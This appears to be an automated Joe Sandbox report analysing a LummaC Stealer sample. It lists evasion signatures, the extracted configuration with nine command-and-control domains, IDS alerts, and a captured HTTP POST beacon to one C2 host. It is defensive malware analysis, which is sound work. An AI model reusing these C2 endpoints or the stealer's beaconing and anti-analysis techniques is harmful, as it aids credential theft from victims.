Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1571894
MD5:1524da94feeebb2a921c3065f4da2383
SHA1:68ad3edc97d668005f47ac76d5a0f8397d24b8cb
SHA256:4228f1c544520402ca8d8120aca88167f1b23ccb2efb536fe668dc6dd0bc267c
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3508 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1524DA94FEEEBB2A921C3065F4DA2383)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["impend-differ.biz", "covery-mover.biz", "atten-supporse.biz", "formy-spill.biz", "zinc-sneark.biz", "dwell-exclaim.biz", "dare-curbys.biz", "print-vexer.biz", "se-blurry.biz"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-09T20:27:04.558957+010020283713Unknown Traffic192.168.2.649707104.21.64.1443TCP
      2024-12-09T20:27:06.924921+010020283713Unknown Traffic192.168.2.649709104.21.64.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-09T20:27:05.800239+010020546531A Network Trojan was detected192.168.2.649707104.21.64.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-09T20:27:05.800239+010020498361A Network Trojan was detected192.168.2.649707104.21.64.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-09T20:27:04.558957+010020579221Domain Observed Used for C2 Detected192.168.2.649707104.21.64.1443TCP
      2024-12-09T20:27:06.924921+010020579221Domain Observed Used for C2 Detected192.168.2.649709104.21.64.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-09T20:27:03.000167+010020579211Domain Observed Used for C2 Detected192.168.2.6557591.1.1.153UDP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: file.exeAvira: detected
      Antivirus detection for URL or domain
      Source: https://atten-supporse.biz/apirAvira URL Cloud: Label: malware
      Found malware configuration
      Source: file.exe.3508.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["impend-differ.biz", "covery-mover.biz", "atten-supporse.biz", "formy-spill.biz", "zinc-sneark.biz", "dwell-exclaim.biz", "dare-curbys.biz", "print-vexer.biz", "se-blurry.biz"], "Build id": "LOGS11--LiveTraffic"}
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for sample
      Source: file.exeJoe Sandbox ML: detected
      Sample uses string decryption to hide its real strings
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: impend-differ.biz
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: print-vexer.biz
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: dare-curbys.biz
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: covery-mover.biz
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: formy-spill.biz
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: dwell-exclaim.biz
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: zinc-sneark.biz
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: se-blurry.biz
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: atten-supporse.biz
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
      Source: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: LOGS11--LiveTraffic
      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49707 version: TLS 1.2
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]0_2_00F9A960
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edx], bl0_2_00F9CE55
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_00F99CC0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_00FBA060
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]0_2_00FB5F7D
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]0_2_00FB6170
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax0_2_00FB2270
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi+ebx], 00000000h0_2_00F9C274
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_00F9C36E
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00FC45F0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00FB86F0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp al, 2Eh0_2_00FB66E7
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]0_2_00FBC6D7
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], al0_2_00FBC6D7
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]0_2_00FBC6D7
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]0_2_00FBC6D7
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh0_2_00FCE690
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_00FBA630
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00FB0717
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_00FB0717
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00FB86F0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_00FBAAD0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00FCCAC0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi]0_2_00F92B70
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]0_2_00FC6B20
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00FCCCE0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00FCCD60
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h0_2_00FACEA5
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]0_2_00FA6E97
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax0_2_00FA6E97
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00FCCE00
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add ebx, 03h0_2_00FB8F5D
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h0_2_00FA4F08
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, edx0_2_00FA4F08
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_00FAD087
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00FBD085
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00FBD085
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_00FAD074
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]0_2_00FA7190
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]0_2_00FB92D0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ebx0_2_00FB92D0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [00FD4284h]0_2_00FB5230
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_00FBB3DE
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_00FBB3DE
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, bx0_2_00FB536C
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_00FB7307
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00FBB4BB
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00F97470
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00F97470
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00FBB475
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]0_2_00FB96D8
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]0_2_00FB7653
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]0_2_00FA597D
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_00FB5920
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, eax0_2_00F95910
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_00F95910
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]0_2_00FA6E97
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax0_2_00FA6E97
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_00FA5ADC
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00FCDBD0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh0_2_00FCDCF0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_00FA9C10
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]0_2_00FA5EE0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00FB1EE0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00FA7E82
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]0_2_00FBBFDA
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]0_2_00FBBFD3
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h0_2_00FCDFB0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]0_2_00FB5F7D

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.6:55759 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49707 -> 104.21.64.1:443
      Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49709 -> 104.21.64.1:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49707 -> 104.21.64.1:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49707 -> 104.21.64.1:443
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: impend-differ.biz
      Source: Malware configuration extractorURLs: covery-mover.biz
      Source: Malware configuration extractorURLs: atten-supporse.biz
      Source: Malware configuration extractorURLs: formy-spill.biz
      Source: Malware configuration extractorURLs: zinc-sneark.biz
      Source: Malware configuration extractorURLs: dwell-exclaim.biz
      Source: Malware configuration extractorURLs: dare-curbys.biz
      Source: Malware configuration extractorURLs: print-vexer.biz
      Source: Malware configuration extractorURLs: se-blurry.biz
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 104.21.64.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 104.21.64.1:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: atten-supporse.biz
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
      Source: file.exe, 00000000.00000002.2181217989.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2181184047.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/
      Source: file.exe, 00000000.00000003.2179066828.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179066828.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2180995646.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2180062935.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179066828.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2181217989.0000000000C0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api
      Source: file.exe, 00000000.00000003.2179066828.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2181217989.0000000000C0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apir
      Source: file.exe, 00000000.00000002.2180995646.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179066828.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz:443/api
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49707 version: TLS 1.2

      System Summary

      barindex
      PE file contains section with special chars
      Source: file.exeStatic PE information: section name:
      Source: file.exeStatic PE information: section name: .idata
      Source: file.exeStatic PE information: section name:
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F987F00_2_00F987F0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9A9600_2_00F9A960
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC6F900_2_00FC6F90
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010661000_2_01066100
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B41020_2_010B4102
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010141120_2_01014112
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010EE11A0_2_010EE11A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010081170_2_01008117
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC80D90_2_00FC80D9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C61260_2_010C6126
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF40C90_2_00FF40C9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB80B00_2_00FB80B0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010981420_2_01098142
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107E1540_2_0107E154
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107A1650_2_0107A165
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010761750_2_01076175
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A217F0_2_010A217F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010961770_2_01096177
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106818B0_2_0106818B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9E06A0_2_00F9E06A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB5F7D0_2_00FB5F7D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010521A30_2_010521A3
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D81B40_2_010D81B4
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010EA1CC0_2_010EA1CC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010881CB0_2_010881CB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AC1C90_2_010AC1C9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCA0300_2_00FCA030
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106A1E30_2_0106A1E3
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104C1EE0_2_0104C1EE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BC1F60_2_010BC1F6
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B800B0_2_010B800B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F981F00_2_00F981F0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C40140_2_010C4014
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103201C0_2_0103201C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DA02D0_2_010DA02D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC01D00_2_00FC01D0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105A03D0_2_0105A03D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010900320_2_01090032
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AC0360_2_010AC036
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107C03A0_2_0107C03A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DC04B0_2_010DC04B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D60410_2_010D6041
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102A0610_2_0102A061
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A406C0_2_010A406C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB61700_2_00FB6170
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109C0860_2_0109C086
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102609A0_2_0102609A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010440AB0_2_010440AB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010600B10_2_010600B1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010380BE0_2_010380BE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E80CE0_2_010E80CE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFE13A0_2_00FFE13A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010800C00_2_010800C0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B20DD0_2_010B20DD
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BE0D50_2_010BE0D5
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010840FB0_2_010840FB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AE0F90_2_010AE0F9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010360F40_2_010360F4
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108A0F10_2_0108A0F1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBA1000_2_00FBA100
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010463080_2_01046308
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010883140_2_01088314
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100A3260_2_0100A326
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103E32D0_2_0103E32D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010163310_2_01016331
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCE2C00_2_00FCE2C0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103433E0_2_0103433E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9E2A90_2_00F9E2A9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010583750_2_01058375
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010723700_2_01072370
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F942700_2_00F94270
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB22700_2_00FB2270
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103A38D0_2_0103A38D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C439F0_2_010C439F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102C3940_2_0102C394
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105A39A0_2_0105A39A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010243B20_2_010243B2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010203B80_2_010203B8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010143BC0_2_010143BC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010023BF0_2_010023BF
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105C3C10_2_0105C3C1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C23EC0_2_010C23EC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D63EC0_2_010D63EC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A03FF0_2_010A03FF
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F962000_2_00F96200
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DC20F0_2_010DC20F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCA3F00_2_00FCA3F0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010102120_2_01010212
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CC21A0_2_010CC21A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010182160_2_01018216
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115A20E0_2_0115A20E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106222C0_2_0106222C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105A2370_2_0105A237
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103C2380_2_0103C238
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFC3BC0_2_00FFC3BC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100C2580_2_0100C258
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104E25D0_2_0104E25D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF43890_2_00FF4389
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108627E0_2_0108627E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A829B0_2_010A829B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D02990_2_010D0299
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAC3600_2_00FAC360
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010422990_2_01042299
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010062A30_2_010062A3
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010502C40_2_010502C4
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010302EA0_2_010302EA
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010742FC0_2_010742FC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010325130_2_01032513
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BC51F0_2_010BC51F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010225180_2_01022518
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104C5440_2_0104C544
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010685460_2_01068546
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010EE5430_2_010EE543
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100856B0_2_0100856B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010525720_2_01052572
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010465790_2_01046579
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C45730_2_010C4573
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D85910_2_010D8591
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E5C70_2_0106E5C7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AC5CC0_2_010AC5CC
